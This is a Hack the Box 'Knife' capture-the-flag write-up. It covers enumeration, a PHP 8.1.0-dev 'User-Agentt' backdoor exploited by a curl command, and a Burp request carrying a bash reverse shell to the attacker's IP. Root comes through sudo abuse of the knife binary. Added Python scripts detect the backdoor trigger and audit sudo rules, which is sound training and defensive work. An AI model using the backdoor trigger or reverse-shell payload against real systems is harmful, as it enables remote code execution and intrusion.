Hack the box - Knife
Updated: Apr 20, 2022
Knife is an extremely easy box that really shows the range of difficulty within the "easy" band of Hack the Box. It caters to beginners and the experienced alike: you can simply copy and paste a CVE script for your initial foothold, or craft the exploit syntax yourself to make it work.
Command injection to code execution
LinPEAS privilege enumeration
As usual we start off with a basic Nmap scan to see what we are working with, and initially our attack surface looks fairly narrow. We follow it with a second-stage scan to enumerate version information, with help from the Nmap Scripting Engine (NSE), using the following flags.
-sC - use default enumeration scripts
-sV - version enumeration
Our more in-depth Nmap scan shows the expected SSH service followed by an HTTP website identified by the title "Emergent Medical Idea"; this is fantastic information.
I noticed that port 1839 did not show up on the in-depth scan.
A targeted scan specifying port 1839 with the -Pn flag skips the ICMP host-discovery ping, in case a firewall has a threshold trigger that the extra traffic from the Nmap Scripting Engine would trip. This turns out not to be the case, and we get no further information.
As always, I like to start AutoRecon in the background after my initial enumeration to pick up any bits and pieces I may have left behind. This can sometimes take up to 30 minutes, so we will check back later.
Upon browsing to port 80 we can see that this website is likely attributed to the medical field.
I start off by running a directory buster in the background to look for hidden directories while I invest time actively enumerating the website. Unfortunately, the directory brute force turns up nothing.
I was not able to click any of the sub-menus in the upper right corner, which was quite odd and suggested that the page was still under development.
I proceeded to check the page contents and other than some basic scripts and formatting there was nothing interesting.
Let's check back on AutoRecon and see if anything was picked up over port 80 that I perhaps missed with only a surface level scan.
Browsing into the AutoRecon scans directory shows many reports we can view, and we go straight to the WhatWeb results. If you don't already know it, WhatWeb is a very powerful website fingerprinting tool. The results are listed below.
WhatWeb report for http://10.129.216.29:80
Status    : 200 OK
Title     : Emergent Medical Idea
IP        : 10.129.216.29
Country   : RESERVED, ZZ

Summary   : PHP[8.1.0-dev], Apache[2.4.41], X-Powered-By[PHP/8.1.0-dev], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], Script

Detected Plugins:
[ Apache ]
    The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards.
    Version      : 2.4.41 (from HTTP Server Header)
    Google Dorks: (3)
    Website     : http://httpd.apache.org/

[ HTML5 ]
    HTML version 5, detected by the doctype declaration

[ HTTPServer ]
    HTTP server header string. This plugin also attempts to identify the operating system from the server header.
    OS           : Ubuntu Linux
    String       : Apache/2.4.41 (Ubuntu) (from server string)

[ PHP ]
    PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. This plugin identifies PHP errors, modules and versions and extracts the local file path and username if present.
    Version      : 8.1.0-dev
    Google Dorks: (2)
    Website     : http://www.php.net/

[ Script ]
    This plugin detects instances of script HTML elements and returns the script language/type.

[ X-Powered-By ]
    X-Powered-By HTTP header
    String       : PHP/8.1.0-dev (from x-powered-by string)

HTTP Headers:
    HTTP/1.1 200 OK
    Date: Wed, 15 Sep 2021 01:58:40 GMT
    Server: Apache/2.4.41 (Ubuntu)
    X-Powered-By: PHP/8.1.0-dev
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Content-Length: 2406
    Connection: close
    Content-Type: text/html; charset=UTF-8
Reviewing the output shows that the website runs PHP, specifically version 8.1.0-dev. Let's take a look at this, as I believe it is an older version we see here.
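The version that matters here comes straight out of two response headers, Server and X-Powered-By. The following script is an added example, not part of the original write-up: it parses the header block WhatWeb printed into a small inventory record and flags a PHP "-dev" build, which is never a shipped release. SAMPLE_HEADERS is copied from the WhatWeb output above; the function and field names are this example's own.

```python
"""Fingerprint a web server from the raw response headers WhatWeb printed.

Added example, not from the original write-up. SAMPLE_HEADERS is copied from
the write-up's WhatWeb output; everything else is this example's own code.
"""
import re
from typing import Dict


SAMPLE_HEADERS = """HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 01:58:40 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2406
Connection: close
Content-Type: text/html; charset=UTF-8
"""


def parse_headers(raw: str) -> Dict[str, str]:
    """Header block -> dict keyed by lower-cased header name (status line skipped)."""
    headers: Dict[str, str] = {}
    for line in raw.strip().splitlines()[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def fingerprint(raw: str) -> Dict[str, object]:
    """Extract server product/version, OS hint and PHP version; flag dev builds."""
    h = parse_headers(raw)
    result: Dict[str, object] = {
        "server": None, "server_version": None, "os": None,
        "php_version": None, "php_dev_build": False,
    }
    # "Apache/2.4.41 (Ubuntu)" -> product, version, optional OS in parentheses
    m = re.match(r"([\w-]+)/([\d.]+)(?:\s*\(([^)]+)\))?", h.get("server", ""))
    if m:
        result["server"], result["server_version"], result["os"] = m.groups()
    # "PHP/8.1.0-dev" -> version string; a "-dev" suffix is an unreleased master build
    m = re.match(r"PHP/(\S+)", h.get("x-powered-by", ""), re.IGNORECASE)
    if m:
        result["php_version"] = m.group(1)
        result["php_dev_build"] = m.group(1).lower().endswith("-dev")
    return result


if __name__ == "__main__":
    for key, value in fingerprint(SAMPLE_HEADERS).items():
        print(f"{key:15}: {value}")
```

On the defensive side, both headers are optional: `expose_php = Off` in php.ini removes X-Powered-By entirely, and `ServerTokens Prod` in the Apache configuration reduces Server to just "Apache", so a scanner like WhatWeb would not have been handed the version on a plate.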
Enumeration - PHP version 8.1.0-dev
I came across a popular exploit on Exploit-DB. This is not straightforward and involves researching the exploit and tampering with the User-Agent field.
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
Here we work through the Exploit-DB and PacketStorm exploits, and after trying to execute system commands through the user agent manually, we resort to the curl command.
CVE - Exploit DB -
CVE - PacketStorm
Code injection - curl
Eventually we solve this with the following curl command.
curl -i -H "User-Agentt: zerodiumsystem('id');" http://10.129.225.112/AAAA.php
Backdoor - Burp Suite
We also solve this by tinkering with the syntax in Burp Suite, which eventually works and provides the callback to our listener.
GET /aaa.php HTTP/1.1
Host: 10.129.225.112
Upgrade-Insecure-Requests: 1
User-Agentt: zerodiumsystem("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.44/6363 0>&1'");
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Our netcat listener catches the reverse shell.
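From the defender's chair, both the curl request and the Burp request above share a signature: a header named "User-Agentt" whose value starts with "zerodium", which no legitimate client sends. The script below is an added example, not part of the original write-up. It parses raw inbound requests and reports two things: any header value carrying the "zerodium" prefix, and, more generally, any header name that is one edit away from a standard name (the pattern behind "User-Agentt"). The three requests are constructed for this example; the second mirrors the write-up's request with the trigger taken from its curl command.

```python
"""Detect the PHP 8.1.0-dev backdoor trigger in raw HTTP requests.

Added example, not from the original write-up. The sample requests below are
constructed; the header name and "zerodium" prefix come from the write-up.
"""
from typing import Dict, List, Tuple

# Header names a normal client sends; anything one edit away from these is suspect.
KNOWN_HEADERS = {
    "host", "user-agent", "accept", "accept-encoding", "accept-language",
    "connection", "upgrade-insecure-requests", "cookie", "referer",
    "content-type", "content-length", "cache-control", "origin",
}

BENIGN = """GET /index.php HTTP/1.1
Host: 10.129.225.112
User-Agent: Mozilla/5.0
Accept: text/html
Connection: close
"""

TRIGGER = """GET /aaa.php HTTP/1.1
Host: 10.129.225.112
Upgrade-Insecure-Requests: 1
User-Agentt: zerodiumsystem('id');
Accept: text/html
Accept-Encoding: gzip, deflate
Connection: close
"""

CUSTOM = """GET /api HTTP/1.1
Host: 10.129.225.112
User-Agent: curl/7.81.0
X-Request-Id: 4f2c
"""


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; header names are short, so the plain DP is cheap."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def parse_request(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw request into its request line and a lower-cased header dict."""
    lines = raw.strip().splitlines()
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def inspect_request(raw: str) -> List[str]:
    """Return findings for one request; an empty list means nothing suspicious."""
    request_line, headers = parse_request(raw)
    findings: List[str] = []
    for name, value in headers.items():
        if name not in KNOWN_HEADERS:
            near = sorted(k for k in KNOWN_HEADERS if edit_distance(name, k) == 1)
            if near:
                findings.append(f"look-alike header {name!r} (one edit from {near[0]!r})")
        if value.lower().startswith("zerodium"):
            findings.append(f"backdoor trigger in {name!r}: {value}")
    return [f"{request_line}: {f}" for f in findings]


if __name__ == "__main__":
    for sample in (BENIGN, TRIGGER, CUSTOM):
        for finding in inspect_request(sample):
            print(finding)
```

Note where this has to run: Apache's default combined log format records only the real User-Agent header, so access.log never shows "User-Agentt". The check needs full request headers from a WAF, reverse proxy, audit log or packet capture.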
I am largely in the habit of uploading privilege enumeration scripts such as LinPEAS, however I always check for low-hanging fruit in the user's home directory first. Running a "sudo -l" command we actually see a result which is likely the path to root.
Knife enumeration and GTFOBins
After tampering with the knife binary, failing to inject code or abuse the symbolic link, I eventually looked it up on GTFOBins, where I found the sudo abuse and we made our way to root.
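The root path on this box was a single sudo rule, which is exactly the kind of thing a periodic audit should catch before a GTFOBins lookup does. The script below is an added example, not part of the write-up: it parses "sudo -l" output and reports every rule that runs as root without a password, plus any root rule whose binary is outside an allowlist an operator has reviewed. The sample output, the user name "lowpriv", the allowlist and the paths are constructed for this example (the write-up does not print them).

```python
"""Audit `sudo -l` output for rules that can hand a low-privilege user root.

Added example, not from the write-up. SAMPLE_SUDO_L, the user "lowpriv", the
allowlist and the binary paths are constructed for this example.
"""
import re
from typing import List

SAMPLE_SUDO_L = """Matching Defaults entries for lowpriv on knife:
    env_reset, mail_badpass

User lowpriv may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
    (root) /usr/bin/systemctl restart apache2
"""

# Constructed allowlist: binaries an operator has reviewed as acceptable sudo targets.
ALLOWLIST = {"/usr/bin/systemctl"}

# One privilege line: "(runas[:group]) [TAG: ...] command [args]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")


def parse_rules(output: str) -> List[dict]:
    """Pick the privilege lines out of `sudo -l` output; headings and Defaults are skipped."""
    rules: List[dict] = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        rules.append({
            "runas": m.group("runas").split(":")[0].strip(),
            "tags": re.findall(r"[A-Z]+", m.group("tags")),
            "cmd": m.group("cmd"),
        })
    return rules


def audit(output: str) -> List[str]:
    """Return one finding per risky rule; an empty list means the rules all passed."""
    findings: List[str] = []
    for rule in parse_rules(output):
        if rule["runas"] not in ("root", "ALL"):
            continue
        binary = rule["cmd"].split()[0]
        if "NOPASSWD" in rule["tags"]:
            findings.append(f"NOPASSWD root rule: {rule['cmd']}")
        if binary not in ALLOWLIST:
            findings.append(f"root rule for unreviewed binary: {binary}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_SUDO_L):
        print(finding)
```

The knife rule is flagged twice: it needs no password, and the binary is not on the reviewed list, which is the right outcome given that GTFOBins documents it as a sudo escape. The fix is to restrict the rule to the specific subcommand and arguments the user actually needs, or to drop it.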